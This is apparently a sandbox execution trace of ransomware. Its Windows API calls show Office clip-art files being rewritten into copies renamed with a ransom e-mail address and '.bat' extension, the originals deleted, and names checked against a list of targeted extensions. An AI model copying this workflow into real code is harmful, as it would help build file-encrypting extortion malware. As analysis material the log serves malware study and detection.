WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x73b0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x73b0, lpOverlapped=0x0) returned 1 [0198.959] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.959] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.959] SetEndOfFile (hFile=0x390) returned 1 [0199.144] CloseHandle (hObject=0x390) returned 1 [0199.144] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.144] SetEndOfFile (hFile=0x378) returned 1 [0199.145] CloseHandle (hObject=0x378) returned 1 [0199.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.145] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf")) returned 1 [0199.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.146] lstrlenW (lpString=".doc") returned 4 [0199.146] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString=".docx") returned 5 [0199.146] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0199.146] lstrlenW (lpString=".pdf") returned 4 [0199.146] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString=".xls") returned 4 [0199.146] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.146] lstrlenW (lpString=".xlsx") returned 5 [0199.146] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0199.146] lstrlenW (lpString=".ppt") returned 4 [0199.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.146] lstrlenW (lpString=".zip") returned 4 [0199.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.146] lstrlenW (lpString=".rar") returned 4 [0199.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString=".bz2") returned 4 [0199.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString=".7z") returned 3 [0199.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.146] lstrlenW (lpString=".dbf") returned 4 [0199.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.146] lstrlenW (lpString=".1cd") returned 4 [0199.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF") returned 68 [0199.147] lstrlenW (lpString=".jpg") returned 4 [0199.147] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.147] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.147] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.148] GetLastError () returned 0x0 [0199.148] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xe60, lpOverlapped=0x0) returned 1 [0199.149] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xe70, lpOverlapped=0x0) returned 1 [0199.149] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.149] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.149] SetEndOfFile (hFile=0x390) returned 1 [0199.150] CloseHandle (hObject=0x390) returned 1 [0199.150] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.150] SetEndOfFile (hFile=0x378) returned 1 [0199.150] CloseHandle (hObject=0x378) returned 1 [0199.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf")) returned 1 [0199.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.151] lstrlenW (lpString=".doc") returned 4 [0199.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.151] lstrlenW (lpString=".docx") returned 5 [0199.151] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.151] lstrlenW (lpString=".pdf") returned 4 [0199.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.151] lstrlenW (lpString=".xls") returned 4 [0199.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.151] lstrlenW (lpString=".xlsx") returned 5 [0199.151] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.151] lstrlenW (lpString=".ppt") returned 4 [0199.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.151] lstrlenW (lpString=".zip") returned 4 [0199.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.152] lstrlenW (lpString=".rar") returned 4 [0199.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.152] lstrlenW (lpString=".bz2") returned 4 [0199.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.152] lstrlenW (lpString=".7z") returned 3 [0199.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.152] lstrlenW (lpString=".dbf") returned 4 [0199.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.152] lstrlenW (lpString=".1cd") returned 4 [0199.152] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF") returned 68 [0199.152] lstrlenW (lpString=".jpg") returned 4 [0199.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.152] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.152] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.153] GetLastError () returned 0x0 [0199.153] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xbbc, lpOverlapped=0x0) returned 1 [0199.162] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xbc0, lpOverlapped=0x0) returned 1 [0199.163] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.163] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.163] SetEndOfFile (hFile=0x390) returned 1 [0199.163] CloseHandle (hObject=0x390) returned 1 [0199.163] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.163] SetEndOfFile (hFile=0x378) returned 1 [0199.164] CloseHandle (hObject=0x378) returned 1 [0199.164] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf")) returned 1 [0199.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.164] lstrlenW (lpString=".doc") returned 4 [0199.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString=".docx") returned 5 [0199.165] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0199.165] lstrlenW (lpString=".pdf") returned 4 [0199.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString=".xls") returned 4 [0199.165] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.165] lstrlenW (lpString=".xlsx") returned 5 [0199.165] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0199.165] lstrlenW (lpString=".ppt") returned 4 [0199.165] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.165] lstrlenW (lpString=".zip") returned 4 [0199.165] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.165] lstrlenW (lpString=".rar") returned 4 [0199.165] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString=".bz2") returned 4 [0199.165] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString=".7z") returned 3 [0199.165] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.165] lstrlenW (lpString=".dbf") returned 4 [0199.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.165] lstrlenW (lpString=".1cd") returned 4 [0199.165] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF") returned 68 [0199.165] lstrlenW (lpString=".jpg") returned 4 [0199.165] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.166] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.166] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.166] GetLastError () returned 0x0 [0199.166] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x128e, lpOverlapped=0x0) returned 1 [0199.168] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1290, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1290, lpOverlapped=0x0) returned 1 [0199.169] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.169] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.169] SetEndOfFile (hFile=0x390) returned 1 [0199.169] CloseHandle (hObject=0x390) returned 1 [0199.169] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.169] SetEndOfFile (hFile=0x378) returned 1 [0199.170] CloseHandle (hObject=0x378) returned 1 [0199.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf")) returned 1 [0199.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.171] lstrlenW (lpString=".doc") returned 4 [0199.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.171] lstrlenW (lpString=".docx") returned 5 [0199.171] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0199.171] lstrlenW (lpString=".pdf") returned 4 [0199.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.171] lstrlenW (lpString=".xls") returned 4 [0199.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.171] lstrlenW (lpString=".xlsx") returned 5 [0199.171] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0199.171] lstrlenW (lpString=".ppt") returned 4 [0199.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.171] lstrlenW (lpString=".zip") returned 4 [0199.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.171] lstrlenW (lpString=".rar") returned 4 [0199.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.171] lstrlenW (lpString=".bz2") returned 4 [0199.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.171] lstrlenW (lpString=".7z") returned 3 [0199.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.172] lstrlenW (lpString=".dbf") returned 4 [0199.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.172] lstrlenW (lpString=".1cd") returned 4 [0199.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF") returned 68 [0199.172] lstrlenW (lpString=".jpg") returned 4 [0199.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.172] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.172] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.173] GetLastError () returned 0x0 [0199.173] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x14ce, lpOverlapped=0x0) returned 1 [0199.174] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x14d0, lpOverlapped=0x0) returned 1 [0199.175] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.175] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.175] SetEndOfFile (hFile=0x390) returned 1 [0199.175] CloseHandle (hObject=0x390) returned 1 [0199.175] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.175] SetEndOfFile (hFile=0x378) returned 1 [0199.176] CloseHandle (hObject=0x378) returned 1 [0199.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf")) returned 1 [0199.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.177] lstrlenW (lpString=".doc") returned 4 [0199.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.177] lstrlenW (lpString=".docx") returned 5 [0199.177] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0199.177] lstrlenW (lpString=".pdf") returned 4 [0199.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.177] lstrlenW (lpString=".xls") returned 4 [0199.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.177] lstrlenW (lpString=".xlsx") returned 5 [0199.177] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0199.177] lstrlenW (lpString=".ppt") returned 4 [0199.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.177] lstrlenW (lpString=".zip") returned 4 [0199.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.178] lstrlenW (lpString=".rar") returned 4 [0199.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.178] lstrlenW (lpString=".bz2") returned 4 [0199.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.178] lstrlenW (lpString=".7z") returned 3 [0199.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.178] lstrlenW (lpString=".dbf") returned 4 [0199.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.178] lstrlenW (lpString=".1cd") returned 4 [0199.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF") returned 68 [0199.178] lstrlenW (lpString=".jpg") returned 4 [0199.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.178] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.178] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.179] GetLastError () returned 0x0 [0199.179] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xef2, lpOverlapped=0x0) returned 1 [0199.180] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xf00, lpOverlapped=0x0) returned 1 [0199.181] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.181] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.181] SetEndOfFile (hFile=0x390) returned 1 [0199.182] CloseHandle (hObject=0x390) returned 1 [0199.182] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.182] SetEndOfFile (hFile=0x378) returned 1 [0199.183] CloseHandle (hObject=0x378) returned 1 [0199.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf")) returned 1 [0199.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.184] lstrlenW (lpString=".doc") returned 4 [0199.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.184] lstrlenW (lpString=".docx") returned 5 [0199.184] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 